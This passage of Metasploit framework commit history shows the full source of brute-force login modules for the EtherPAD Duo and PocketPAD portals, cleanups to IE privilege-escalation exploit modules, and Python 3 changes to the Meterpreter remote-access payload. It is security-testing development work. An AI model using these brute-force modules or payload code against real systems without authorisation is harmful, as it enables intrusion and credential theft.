=> %{ + This module scans for EtherPAD Duo login portal, and + performs a login brute force attack to identify valid credentials. }, - 'Author' => - [ - 'Karn Ganeshen <KarnGaneshen[at]gmail.com>', - ], - 'License' => MSF_LICENSE - )) + 'Author' => + [ + 'Karn Ganeshen <KarnGaneshen[at]gmail.com>', + ], + 'License' => MSF_LICENSE + )) -end - -def run_host(ip) - unless is_app_epaduo? - return end - print_status("#{peer} - Starting login brute force...") - each_user_pass do |user, pass| - do_login(user, pass) - end -end + def run_host(ip) + unless is_app_epaduo? + return + end -# -# What's the point of running this module if the target actually isn't EtherPAD Duo -# - -def is_app_epaduo? - begin - res = send_request_cgi( - { - 'uri' => '/CGI/mParseCGI?file=mainpage.html', - 'method' => 'GET' - }) - rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError - vprint_error("#{peer} - HTTP Connection Failed...") - return false - end - - if (res and res.code == 200 and res.headers['Server'].include?("EtherPAD") and res.body.include?("EtherPAD Duo")) - vprint_good("#{peer} - Running EtherPAD Duo application ...") - return true - else - vprint_error("#{peer} - Application is not EtherPAD Duo. Module will not continue.") - return false + print_status("#{peer} - Starting login brute force...") + each_user_pass do |user, pass| + do_login(user, pass) end end -# -# Brute-force the login page -# + # + # What's the point of running this module if the target actually isn't EtherPAD Duo + # -def do_login(user, pass) - vprint_status("#{peer} - Trying username:#{user.inspect} with password:#{pass.inspect}") - begin - res = send_request_cgi( - { - 'uri' => '/config/configindex.ehtml', - 'method' => 'GET', - 'authorization' => basic_auth(user,pass) - }) - rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE - vprint_error("#{peer} - HTTP Connection Failed...") - return :abort + def is_app_epaduo? + begin + res = send_request_cgi( + { + 'uri' => normalize_uri('/', 'CGI', 'mParseCGI'), + 'method' => 'GET', + 'vars_get' => { + 'file' => 'mainpage.html' + } + }) + rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError + vprint_error("#{peer} - HTTP Connection Failed...") + return false + end + + if (res and res.code == 200 and res.headers['Server'].include?("EtherPAD") and res.body.include?("EtherPAD Duo")) + vprint_good("#{peer} - Running EtherPAD Duo application ...") + return true + else + vprint_error("#{peer} - Application is not EtherPAD Duo. Module will not continue.") + return false + end end - if (res and res.code == 200 and res.body.include?("Home Page") and res.headers['Server'].include?("EtherPAD")) - print_good("#{peer} - SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}") - report_hash = { - :host => rhost, - :port => rport, - :sname => 'EtherPAD Duo Portal', - :user => user, - :pass => pass, - :active => true, - :type => 'password' - } - report_auth_info(report_hash) - return :next_user - else - vprint_error("#{peer} - FAILED LOGIN - #{user.inspect}:#{pass.inspect}") + # + # Brute-force the login page + # + + def do_login(user, pass) + vprint_status("#{peer} - Trying username:#{user.inspect} with password:#{pass.inspect}") + + begin + res = send_request_cgi( + { + 'uri' => normalize_uri('/', 'config', 'configindex.ehtml'), + 'method' => 'GET', + 'authorization' => basic_auth(user,pass) + }) + rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE + vprint_error("#{peer} - HTTP Connection Failed...") + return :abort + end + + if res && res.code == 200 && res.body.include?("Home Page") && res.headers['Server'] && res.headers['Server'].include?("EtherPAD") + print_good("#{peer} - SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}") + report_hash = { + :host => rhost, + :port => rport, + :sname => 'EtherPAD Duo Portal', + :user => user, + :pass => pass, + :active => true, + :type => 'password' + } + report_auth_info(report_hash) + return :next_user + else + vprint_error("#{peer} - FAILED LOGIN - #{user.inspect}:#{pass.inspect}") + end end end -end From d92a7adc68afb0b6c2fabd529319799d18dede42 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan_vazquez@rapid7.com> Date: Fri, 30 May 2014 11:31:49 -0500 Subject: [PATCH 429/853] change module filename --- .../http/{etherpadduo_login.rb => etherpad_duo_login.rb} | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename modules/auxiliary/scanner/http/{etherpadduo_login.rb => etherpad_duo_login.rb} (98%) diff --git a/modules/auxiliary/scanner/http/etherpadduo_login.rb b/modules/auxiliary/scanner/http/etherpad_duo_login.rb similarity index 98% rename from modules/auxiliary/scanner/http/etherpadduo_login.rb rename to modules/auxiliary/scanner/http/etherpad_duo_login.rb index ae1096c3b7..f17d451bee 100644 --- a/modules/auxiliary/scanner/http/etherpadduo_login.rb +++ b/modules/auxiliary/scanner/http/etherpad_duo_login.rb @@ -78,7 +78,7 @@ class Metasploit3 < Msf::Auxiliary { 'uri' => normalize_uri('/', 'config', 'configindex.ehtml'), 'method' => 'GET', - 'authorization' => basic_auth(user,pass) + 'authorization' => basic_auth(user, pass) }) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE vprint_error("#{peer} - HTTP Connection Failed...") From b0bdfa76801b050a9be537eb1fa68b877af814fd Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan_vazquez@rapid7.com> Date: Fri, 30 May 2014 11:44:42 -0500 Subject: [PATCH 430/853] Clean up code --- .../auxiliary/scanner/http/pocketpad_login.rb | 178 +++++++++--------- 1 file changed, 89 insertions(+), 89 deletions(-) diff --git a/modules/auxiliary/scanner/http/pocketpad_login.rb b/modules/auxiliary/scanner/http/pocketpad_login.rb index 2db142e4df..1a7dc9da52 100644 --- a/modules/auxiliary/scanner/http/pocketpad_login.rb +++ b/modules/auxiliary/scanner/http/pocketpad_login.rb @@ -7,98 +7,98 @@ require 'msf/core' class Metasploit3 < Msf::Auxiliary -include Msf::Exploit::Remote::HttpClient -include Msf::Auxiliary::Report -include Msf::Auxiliary::AuthBrute -include Msf::Auxiliary::Scanner + include Msf::Exploit::Remote::HttpClient + include Msf::Auxiliary::Report + include Msf::Auxiliary::AuthBrute + include Msf::Auxiliary::Scanner -def initialize(info={}) - super(update_info(info, - 'Name' => 'PocketPAD Login Brute Force Utility', - 'Description' => %{ - This module scans for PocketPAD login portal, and - performs a login brute force attack to identify valid credentials. + def initialize(info={}) + super(update_info(info, + 'Name' => 'PocketPAD Login Brute Force Utility', + 'Description' => %{ + This module scans for PocketPAD login portal, and + performs a login brute force attack to identify valid credentials. }, - 'Author' => - [ - 'Karn Ganeshen <KarnGaneshen[at]gmail.com>', - ], - 'License' => MSF_LICENSE - )) -end - -def run_host(ip) - unless is_app_popad? - return + 'Author' => + [ + 'Karn Ganeshen <KarnGaneshen[at]gmail.com>', + ], + 'License' => MSF_LICENSE + )) end - print_status("#{peer} - Starting login brute force...") - each_user_pass do |user, pass| - do_login(user, pass) + def run_host(ip) + unless is_app_popad? + return + end + + print_status("#{peer} - Starting login brute force...") + each_user_pass do |user, pass| + do_login(user, pass) + end + end + + # + # What's the point of running this module if the target actually isn't PocketPAD + # + + def is_app_popad? + begin + res = send_request_cgi( + { + 'uri' => '/', + 'method' => 'GET' + }) + rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError + vprint_error("#{peer} - HTTP Connection Failed...") + return false + end + + if res && res.code == 200 && res.headers['Server'] && res.headers['Server'].include?("Smeagol") && res.body.include?("PocketPAD") + vprint_good("#{peer} - Running PocketPAD application ...") + return true + else + vprint_error("#{peer} - Application is not PocketPAD. Module will not continue.") + return false + end + end + + # + # Brute-force the login page + # + + def do_login(user, pass) + vprint_status("#{peer} - Trying username:#{user.inspect} with password:#{pass.inspect}") + begin + res = send_request_cgi( + { + 'uri' => '/cgi-bin/config.cgi', + 'method' => 'POST', + 'authorization' => basic_auth(user,pass), + 'vars_post' => { + 'file' => "configindex.html" + } + }) + rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE + vprint_error("#{peer} - HTTP Connection Failed...") + return :abort + end + + if (res && res.code == 200 && res.body.include?("Home Page") && res.headers['Server'] && res.headers['Server'].include?("Smeagol")) + print_good("#{peer} - SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}") + report_hash = { + :host => rhost, + :port => rport, + :sname => 'PocketPAD Portal', + :user => user, + :pass => pass, + :active => true, + :type => 'password' + } + report_auth_info(report_hash) + return :next_user + else + vprint_error("#{peer} - FAILED LOGIN - #{user.inspect}:#{pass.inspect}") + end end end - -# -# What's the point of running this module if the target actually isn't PocketPAD -# - -def is_app_popad? - begin - res = send_request_cgi( - { - 'uri' => '/', - 'method' => 'GET' - }) - rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError - vprint_error("#{peer} - HTTP Connection Failed...") - false return - end - - if (res and res.code == 200 and res.headers['Server'].include?("Smeagol") and res.body.include?("PocketPAD")) - vprint_good("#{peer} - Running PocketPAD application ...") - return true - else - vprint_error("#{peer} - Application is not PocketPAD. Module will not continue.") - return false - end -end - -# -# Brute-force the login page -# - -def do_login(user, pass) - vprint_status("#{peer} - Trying username:#{user.inspect} with password:#{pass.inspect}") - begin - res = send_request_cgi( - { - 'uri' => '/cgi-bin/config.cgi', - 'method' => 'POST', - 'authorization' => basic_auth(user,pass), - 'vars_post' => { - 'file' => "configindex.html" - } - }) - rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE - vprint_error("#{peer} - HTTP Connection Failed...") - return :abort - end - - if (res and res.code == 200 and res.body.include?("Home Page") and res.headers['Server'].include?("Smeagol")) - print_good("#{peer} - SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}") - report_hash = { - :host => rhost, - :port => rport, - :sname => 'PocketPAD Portal', - :user => user, - :pass => pass, - :active => true, - :type => 'password' - } - report_auth_info(report_hash) - return :next_user - else - vprint_error("#{peer} - FAILED LOGIN - #{user.inspect}:#{pass.inspect}") - end -end -end From e215bd6e398ef7b6bcbc1c61432aeca2f12a9c76 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan_vazquez@rapid7.com> Date: Fri, 30 May 2014 12:07:59 -0500 Subject: [PATCH 431/853] Delete unnecessary code and use get_env --- .../windows/local/ms13_097_ie_registry_symlink.rb | 9 +-------- 1 file changed, 1 insertion(+), 8 deletions(-) diff --git a/modules/exploits/windows/local/ms13_097_ie_registry_symlink.rb b/modules/exploits/windows/local/ms13_097_ie_registry_symlink.rb index c0e1c9d897..42e030015e 100644 --- a/modules/exploits/windows/local/ms13_097_ie_registry_symlink.rb +++ b/modules/exploits/windows/local/ms13_097_ie_registry_symlink.rb @@ -82,7 +82,7 @@ class Metasploit3 < Msf::Exploit::Local html_uri = "#{get_uri}/#{rand_text_alpha(4 + rand(4))}.html" session.railgun.kernel32.SetEnvironmentVariableA("HTML_URL", html_uri) - temp = session.sys.config.getenv('TEMP') + temp = get_env('TEMP') print_status("Loading Exploit Library...") @@ -124,12 +124,5 @@ window.close(); end end - def get_dll - path = File.join(Msf::Config.data_directory, "exploits", "CVE-2013-5045", "CVE-2013-5045.dll") - dll = File.open(path, "rb") {|fd| fd.read(fd.stat.size) } - - dll - end - end From b27a95c0081e1e39dd688de3b8e660d74e5fc627 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan_vazquez@rapid7.com> Date: Fri, 30 May 2014 12:08:55 -0500 Subject: [PATCH 432/853] Delete unused code --- modules/exploits/windows/local/ms14_009_ie_dfsvc.rb | 7 ------- 1 file changed, 7 deletions(-) diff --git a/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb b/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb index 2e515e13fc..fd21d825d1 100644 --- a/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb +++ b/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb @@ -112,12 +112,5 @@ shell.Run(command); end end - def get_dll - path = File.join(Msf::Config.data_directory, "exploits", "CVE-2014-0257", "CVE-2014-0257.dll") - dll = File.open(path, "rb") {|fd| fd.read(fd.stat.size) } - - dll - end - end From b99b577705c535caaef9389782e85ffa31591e2c Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan_vazquez@rapid7.com> Date: Fri, 30 May 2014 12:20:00 -0500 Subject: [PATCH 433/853] Clean environment variable --- modules/exploits/windows/local/ms14_009_ie_dfsvc.rb | 2 ++ 1 file changed, 2 insertions(+) diff --git a/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb b/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb index fd21d825d1..aebb4529cd 100644 --- a/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb +++ b/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb @@ -77,6 +77,8 @@ class Metasploit3 < Msf::Exploit::Local Timeout.timeout(datastore['DELAY']) { super } rescue Timeout::Error end + + session.railgun.kernel32.SetEnvironmentVariableA("MYURL", nil) end def primer From 3ae4a1671766a92ec7aa468054ae5c3d914877a2 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan_vazquez@rapid7.com> Date: Fri, 30 May 2014 12:21:23 -0500 Subject: [PATCH 434/853] Clean environment variables --- modules/exploits/windows/local/ms13_097_ie_registry_symlink.rb | 3 +++ 1 file changed, 3 insertions(+) diff --git a/modules/exploits/windows/local/ms13_097_ie_registry_symlink.rb b/modules/exploits/windows/local/ms13_097_ie_registry_symlink.rb index 42e030015e..457a90bb90 100644 --- a/modules/exploits/windows/local/ms13_097_ie_registry_symlink.rb +++ b/modules/exploits/windows/local/ms13_097_ie_registry_symlink.rb @@ -73,6 +73,9 @@ class Metasploit3 < Msf::Exploit::Local Timeout.timeout(datastore['DELAY']) { super } rescue Timeout::Error end + + session.railgun.kernel32.SetEnvironmentVariableA("HTA_URL", nil) + session.railgun.kernel32.SetEnvironmentVariableA("HTML_URL", nil) end def primer From 4f5ab2c596becfd78ca0864501e07953d3acb0f9 Mon Sep 17 00:00:00 2001 From: Spencer McIntyre <zeroSteiner@gmail.com> Date: Fri, 30 May 2014 14:35:47 -0400 Subject: [PATCH 435/853] Pymeterpreter support process channels for Python v3 --- data/meterpreter/ext_server_stdapi.py | 3 +- data/meterpreter/meterpreter.py | 47 +++++++++++++++++++-------- 2 files changed, 35 insertions(+), 15 deletions(-) diff --git a/data/meterpreter/ext_server_stdapi.py b/data/meterpreter/ext_server_stdapi.py index 3155e788da..0af3c87a30 100644 --- a/data/meterpreter/ext_server_stdapi.py +++ b/data/meterpreter/ext_server_stdapi.py @@ -702,6 +702,7 @@ def stdapi_sys_process_execute(request, response): proc_h.stderr = open(os.devnull, 'rb') else: proc_h = STDProcess(args, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE) + proc_h.echo_protection = True proc_h.start() else: proc_h = subprocess.Popen(args, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE) @@ -1207,7 +1208,7 @@ def stdapi_net_config_get_interfaces_via_windll_mib(): table_data = ctypes.string_at(table, pdwSize.value) entries = struct.unpack('I', table_data[:4])[0] table_data = table_data[4:] - for i in xrange(entries): + for i in range(entries): addrrow = cstruct_unpack(MIB_IPADDRROW, table_data) ifrow = MIB_IFROW() ifrow.dwIndex = addrrow.dwIndex diff --git a/data/meterpreter/meterpreter.py b/data/meterpreter/meterpreter.py index 7bc733cfc5..24a635bbfc 100644 --- a/data/meterpreter/meterpreter.py +++ b/data/meterpreter/meterpreter.py @@ -8,6 +8,7 @@ import struct import subprocess import sys import threading +import time import traceback try: @@ -120,7 +121,7 @@ def export(symbol): def generate_request_id(): chars = 'abcdefghijklmnopqrstuvwxyz' - return ''.join(random.choice(chars) for x in xrange(32)) + return ''.join(random.choice(chars) for x in range(32)) @export def inet_pton(family, address): @@ -223,11 +224,11 @@ class STDProcessBuffer(threading.Thread): threading.Thread.__init__(self) self.std = std self.is_alive = is_alive - self.data = '' + self.data = bytes() self.data_lock = threading.RLock() def run(self): - for byte in iter(lambda: self.std.read(1), ''): + for byte in iter(lambda: self.std.read(1), bytes()): self.data_lock.acquire() self.data += byte self.data_lock.release() @@ -235,15 +236,20 @@ class STDProcessBuffer(threading.Thread): def is_read_ready(self): return len(self.data) != 0 - def read(self, l = None): - data = '' + def peek(self, l = None): + data = bytes() self.data_lock.acquire() if l == None: data = self.data - self.data = '' else: data = self.data[0:l] - self.data = self.data[l:] + self.data_lock.release() + return data + + def read(self, l = None): + self.data_lock.acquire() + data = self.peek(l) + self.data = self.data[len(data):] self.data_lock.release() return data @@ -251,12 +257,25 @@ class STDProcessBuffer(threading.Thread): class STDProcess(subprocess.Popen): def __init__(self, *args, **kwargs): subprocess.Popen.__init__(self, *args, **kwargs) + self.echo_protection = False def start(self): self.stdout_reader = STDProcessBuffer(self.stdout, lambda: self.poll() == None) self.stdout_reader.start() self.stderr_reader = STDProcessBuffer(self.stderr, lambda: self.poll() == None) self.stderr_reader.start() + + def write(self, channel_data): + self.stdin.write(channel_data) + self.stdin.flush() + if self.echo_protection: + end_time = time.time() + 0.5 + out_data = bytes() + while (time.time() < end_time) and (out_data != channel_data): + if self.stdout_reader.is_read_ready(): + out_data = self.stdout_reader.peek(len(channel_data)) + if out_data == channel_data: + self.stdout_reader.read(len(channel_data)) export(STDProcess) class PythonMeterpreter(object): @@ -310,17 +329,17 @@ class PythonMeterpreter(object): else: channels_for_removal = [] # iterate over the keys because self.channels could be modified if one is closed - channel_ids = self.channels.keys() + channel_ids = list(self.channels.keys()) for channel_id in channel_ids: channel = self.channels[channel_id] - data = '' + data = bytes() if isinstance(channel, STDProcess): if not channel_id in self.interact_channels: continue - if channel.stdout_reader.is_read_ready(): - data = channel.stdout_reader.read() - elif channel.stderr_reader.is_read_ready(): + if channel.stderr_reader.is_read_ready(): data = channel.stderr_reader.read() + elif channel.stdout_reader.is_read_ready(): + data = channel.stdout_reader.read() elif channel.poll() != None: self.handle_dead_resource_channel(channel_id) elif isinstance(channel, MeterpreterSocketClient): @@ -328,7 +347,7 @@ class PythonMeterpreter(object): try: d = channel.recv(1) except socket.error: - d = '' + d = bytes() if len(d) == 0: self.handle_dead_resource_channel(channel_id) break @@ -474,7 +493,7 @@ class PythonMeterpreter(object): if channel.poll() != None: self.handle_dead_resource_channel(channel_id) return ERROR_FAILURE, response - channel.stdin.write(channel_data) + channel.write(channel_data) elif isinstance(channel, MeterpreterFile): channel.write(channel_data) elif isinstance(channel, MeterpreterSocket): From 74400549a106f68f1d3e788894dd894641c968f0 Mon Sep 17 00:00:00 2001 From: RageLtMan <rageltman [at] sempervictus> Date: Fri, 30 May 2014 14:39:51 -0400 Subject: [PATCH 436/853] Resolve undefined method `get_cookies' Anemone::Page is not a Rex HTTP request/response, and uses the :cookies method to return an array of cookies. This resolves the method naming error, though it does break with Rex naming convention since Anemone still uses a lot non-Rex methods for working with pages/traffic. --- modules/auxiliary/scanner/http/crawler.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/auxiliary/scanner/http/crawler.rb b/modules/auxiliary/scanner/http/crawler.rb index 0915ee3da3..0b0b34a7ee 100644 --- a/modules/auxiliary/scanner/http/crawler.rb +++ b/modules/auxiliary/scanner/http/crawler.rb @@ -104,8 +104,8 @@ class Metasploit3 < Msf::Auxiliary info[:ctype] = page.headers['content-type'] end - if !page.get_cookies.empty? - info[:cookie] = page.get_cookies + if !page.cookies.empty? + info[:cookie] = page.cookies end if page.headers['authorization'] From 730ca62089371fdc23467ec8d7c08316c5f20ef3 Mon Sep 17 00:00:00 2001 From: Tod Beardsley <tod_beardsley@rapid7.com> Date: Fri, 30 May 2014 14:27:54 -0500 Subject: [PATCH 437/853] Bump to p547 to fix a regression in p545 In my excitement of landing #3281 I didn't check to see if there was a newer Ruby available. Turns out, p547 was released on May 16, and fixes a regression regarding OpenSSL. Announcement: https://www.ruby-lang.org/en/news/2014/05/16/ruby-1-9-3-p547-released/ Sorry about the shuffle. --- .ruby-version | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.ruby-version b/.ruby-version index 671d1fe46c..75bfecd56a 100644 --- a/.ruby-version +++ b/.ruby-version @@ -1 +1 @@ -1.9.3-p545 +1.9.3-p547 From 77eac38b012baf10e2ffa474abee82e5455a6c24 Mon Sep 17 00:00:00 2001 From: Spencer McIntyre <zeroSteiner@gmail.com> Date: Fri, 30 May 2014 16:32:03 -0400 Subject: [PATCH 438/853] Pymeterpreter fix processes_via_proc for Python v3 --- data/meterpreter/ext_server_stdapi.py | 4 ++-- modules/payloads/stages/python/meterpreter.rb | 1 - 2 files changed, 2 insertions(+), 3 deletions(-) diff --git a/data/meterpreter/ext_server_stdapi.py b/data/meterpreter/ext_server_stdapi.py index 0af3c87a30..ed7e58701a 100644 --- a/data/meterpreter/ext_server_stdapi.py +++ b/data/meterpreter/ext_server_stdapi.py @@ -753,14 +753,14 @@ def stdapi_sys_process_get_processes_via_proc(request, response): def stdapi_sys_process_get_processes_via_ps(request, response): ps_args = ['ps', 'ax', '-w', '-o', 'pid,ppid,user,command'] proc_h = subprocess.Popen(ps_args, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE) - ps_output = proc_h.stdout.read() + ps_output = str(proc_h.stdout.read()) ps_output = ps_output.split('\n') ps_output.pop(0) for process in ps_output: process = process.split() if len(process) < 4: break - pgroup = '' + pgroup = bytes() pgroup += tlv_pack(TLV_TYPE_PID, int(process[0])) pgroup += tlv_pack(TLV_TYPE_PARENT_PID, int(process[1])) pgroup += tlv_pack(TLV_TYPE_USER_NAME, process[2]) diff --git a/modules/payloads/stages/python/meterpreter.rb b/modules/payloads/stages/python/meterpreter.rb index cb5b286c0b..1862298b82 100644 --- a/modules/payloads/stages/python/meterpreter.rb +++ b/modules/payloads/stages/python/meterpreter.rb @@ -8,7 +8,6 @@ require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/meterpreter_python' require 'msf/base/sessions/meterpreter_options' - module Metasploit3 include Msf::Sessions::MeterpreterOptions From d2b8706bd636e63fbaf9d1dd8e1babc68eb77c3c Mon Sep 17 00:00:00 2001 From: OJ <oj@buffered.io> Date: Sat, 31 May 2014 08:12:34 +1000 Subject: [PATCH 439/853] Include meterpreter bins, add Sandbox builds This commit contains the binaries that are needed for Juan's sandbox escape functionality (ie. the updated old libloader code). It also contains rebuilt binaries for all meterpreter plugins. I've also added command line build scripts for the sandbox escapes and added that to the "exploits" build. --- data/meterpreter/elevator.x64.dll | Bin 90624 -> 90624 bytes data/meterpreter/elevator.x86.dll | Bin 78336 -> 78336 bytes data/meterpreter/ext_server_espia.x64.dll | Bin 203776 -> 203776 bytes data/meterpreter/ext_server_espia.x86.dll | Bin 203264 -> 203264 bytes data/meterpreter/ext_server_extapi.x64.dll | Bin 147968 -> 147968 bytes data/meterpreter/ext_server_extapi.x86.dll | Bin 124416 -> 124416 bytes data/meterpreter/ext_server_incognito.x64.dll | Bin 106496 -> 106496 bytes data/meterpreter/ext_server_incognito.x86.dll | Bin 98816 -> 98816 bytes data/meterpreter/ext_server_kiwi.x64.dll | Bin 284160 -> 284160 bytes data/meterpreter/ext_server_kiwi.x86.dll | Bin 245760 -> 245760 bytes .../meterpreter/ext_server_lanattacks.x64.dll | Bin 227840 -> 227840 bytes .../meterpreter/ext_server_lanattacks.x86.dll | Bin 180736 -> 180736 bytes data/meterpreter/ext_server_mimikatz.x64.dll | Bin 541696 -> 541696 bytes data/meterpreter/ext_server_mimikatz.x86.dll | Bin 406528 -> 406528 bytes data/meterpreter/ext_server_priv.x64.dll | Bin 135168 -> 135168 bytes data/meterpreter/ext_server_priv.x86.dll | Bin 114176 -> 114176 bytes data/meterpreter/ext_server_sniffer.x64.dll | Bin 432640 -> 432640 bytes data/meterpreter/ext_server_sniffer.x86.dll | Bin 431616 -> 424960 bytes data/meterpreter/ext_server_stdapi.x64.dll | Bin 411648 -> 411648 bytes data/meterpreter/ext_server_stdapi.x86.dll | Bin 377344 -> 377344 bytes data/meterpreter/metsrv.x64.dll | Bin 972800 -> 972800 bytes data/meterpreter/metsrv.x86.dll | Bin 770048 -> 770048 bytes data/meterpreter/screenshot.x64.dll | Bin 202752 -> 202752 bytes data/meterpreter/screenshot.x86.dll | Bin 202752 -> 202752 bytes .../exploits/IE11SandboxEscapes/make.msbuild | 18 ++++++++++++++++++ external/source/exploits/make.bat | 10 ++++++++++ 26 files changed, 28 insertions(+) create mode 100755 external/source/exploits/IE11SandboxEscapes/make.msbuild diff --git a/data/meterpreter/elevator.x64.dll b/data/meterpreter/elevator.x64.dll index 78edbaa6014a8baeb41520905f686c8451c5e946..51a59e0838774e3993437d7a2cfa696922349605 100755 GIT binary patch delta 38 scmZoT!rE|zb;1Yc`Tsg5e)eTPx0|uqnQ^-_BjZ7Rkl1#1L&l#509eEjjQ{`u delta 38 scmZoT!rE|zb;1YcKN<-WKl?J92{1J~Gj4ZgWIU)365Gyh$oSI$04OI82><{9 diff --git a/data/meterpreter/elevator.x86.dll b/data/meterpreter/elevator.x86.dll index 90d0859f3a3ca0d31a38fdc2d5ac089546fbd405..f8c755ae3147a32abd839c62f4f6bcb3a79d27ee 100755 GIT binary patch delta 37 rcmZp8!qV`BWx@~Uz<(VRfBQ07*))4GZueqj^x^;sZJ*A`n5h8(GG`8I delta 37 tcmZp8!qV`BWx@|;7mb98zkQj`_BVSmZueqj^x|N4)=1bsos%(B0{|eN4LJY+ diff --git a/data/meterpreter/ext_server_espia.x64.dll b/data/meterpreter/ext_server_espia.x64.dll index c0b576e6461fb6a099dbb62a1aa136344a75e411..2595bdaa8ff732a546c1d5196106404fe5a34f59 100755 GIT binary patch delta 41 vcmZqJ!PBsVXTk^O_5V61e)eUmx!UZ+*zUy0xZR17$>}^uczgQ=rb=%Bh-?xM delta 41 vcmZqJ!PBsVXTk?&d(DK2pM9CUwVIt6+npF0w>vR1Ih_XyZ*RZAROt->J8%wJ diff --git a/data/meterpreter/ext_server_espia.x86.dll b/data/meterpreter/ext_server_espia.x86.dll index 9177e638112c4a82ad2c8ff38b613cf8aae1657f..939cbb2e0fcfb0691af9f5382e2e5b1f12ce3592 100755 GIT binary patch delta 42 ycmZqJ!qc#YX8|K~(!Y+$%#6NF>Cc*j7~6vw8Mg;9G8H{$PW;!g{rD3mOH%+)CJ+t) delta 42 wcmZqJ!qc#YX8|K~yGFufW=3D8M62c?#`Yja#_d6jOhu1D;@giuVX`y@03It1s{jB1 diff --git a/data/meterpreter/ext_server_extapi.x64.dll b/data/meterpreter/ext_server_extapi.x64.dll index 40bb1cfb9472ded81aa1ad99247d067fb3756fbb..01831d3576e464f2350beda1d01f3b77f0f17cf7 100755 GIT binary patch delta 37 rcmZo@;cRH(T)@cu@?XbfW=228zUCmt?Lmx;hu(pNwu^sYd>IG;5&RFH delta 37 rcmZo@;cRH(T)@aYNi$(GGov5l<K`g7?Lmx;hu(pNwu^sYd>IG;>9-9_ diff --git a/data/meterpreter/ext_server_extapi.x86.dll b/data/meterpreter/ext_server_extapi.x86.dll index 76a23ca691df133ad3a8b023d406f539e6dc3616..a4eefd75066a3bf72f952974159bd7b5e10ccf37 100755 GIT binary patch delta 39 tcmZoT!`^U)eS-ue^TdB0lcgDbnI^1h&SKo2#mKm7DM)O)_;SXVb^tWu58D6$ delta 39 vcmZoT!`^U)eS-ue^L34c$<mCzOs5!{vlzE$F*2@N%6v^DVY~Qp#+P;g6DJM$ diff --git a/data/meterpreter/ext_server_incognito.x64.dll b/data/meterpreter/ext_server_incognito.x64.dll index bee4ae67da33a51b681bc5de9e5323bfdbe3773a..d919cc4810bba46b9348ead110daf43b093ad30c 100755 GIT binary patch delta 38 scmZoTz}9epZNdxYb^kghzV>BiUdz~Q&A8o~k@03KNNl@!I^#<V07*#@H~;_u delta 38 scmZoTz}9epZNdv?E6s$7uYH+MGBPz=Gj6wLWW1RQ65B4G&iK*-02j#(aR2}S diff --git a/data/meterpreter/ext_server_incognito.x86.dll b/data/meterpreter/ext_server_incognito.x86.dll index 722c1ace9109aeb9b9be92c67ba9e57f280c9cf0..3dc39f853286a219e8626598ba1536b9e7208e7f 100755 GIT binary patch delta 38 scmZo@VQXk%TfoSi@ULSsGovrl9H!<V#_d6jjF$pIV%yb&8E@(V0Q^x6NdN!< delta 38 rcmZo@VQXk%TfoTNtdTI8nbDVNLRfPU<Mtp%#!G=9vF+-?j5qZF<F5<b diff --git a/data/meterpreter/ext_server_kiwi.x64.dll b/data/meterpreter/ext_server_kiwi.x64.dll index db0da5f462a689c5c7af1d2c35de06e03ce65e46..a95d1c2f32645f2734b953bc3affd0a91ec20653 100755 GIT binary patch delta 48 zcmZozBiOJ;a03S;^Ot`elermvnLBT=G)FVGM>B#j)Anda=A92flH0`}F~2MZ0JR<x A=l}o! delta 48 zcmZozBiOJ;a03S;^BT>B$=r;-%*%CIo1+=qqZvV%X?rvy^Uen#$?f8gm|qqH0Bima A(f|Me diff --git a/data/meterpreter/ext_server_kiwi.x86.dll b/data/meterpreter/ext_server_kiwi.x86.dll index 9f6dcba903cb1793159389650f8f42143aceef9e..5348692063509599b42584d72f41e6a4fe199a32 100755 GIT binary patch delta 47 ycmZo@;BRQ)-yp!qJm+7>WMM{MrvHk~NsR4Dj3CUkJ&BR|Q#43!dw4AK$|L}WJP_aj delta 47 ycmZo@;BRQ)-yp!q{6QmOvM{4BQ)pRp5@UN3BM38XPhw>L6b+Kw9v;iQG6?`+1`js? diff --git a/data/meterpreter/ext_server_lanattacks.x64.dll 